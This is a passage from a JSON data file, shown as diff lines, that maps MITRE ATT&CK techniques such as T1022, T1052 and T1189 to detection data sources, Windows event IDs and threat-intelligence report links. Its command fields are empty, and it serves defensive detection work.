This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + 
"https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + 
"https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://securelist.com/muddywater/88059/", + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1022", + 
"command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ], + [ + "IDS/IPS" + ], + [ + "DLP" + ], + [ + "Network protocol analysis" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD B9", + "Binary file metadata" + ], + [ + "IDS/IPS" + ], + [ + "DLP" + ], + [ + "Network protocol analysis" + ] + ], + "external_reference": [ + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.secureworks.com/research/bronze-union", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1052", + "command_list": [], + "commands": [], + "parsed_datasets": [], + 
"queries": [], + "possible_detections": [ + [ + "4657", + "Registry - USB Keys" + ], + [ + "219", + " 441", + "Registry - USB/PnP IDs" + ], + [ + "Data loss prevention" + ], + [ + "File monitoring" + ], + [ + "4657", + "Registry", + "USB Keys" + ], + [ + "219", + "USB/PnP IDs" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + 
"external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1189", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Web proxy" + ], + [ + "Network intrusion detection system" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Network device logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Web proxy" + ], + [ + "Network intrusion detection system" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "Network device logs" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { 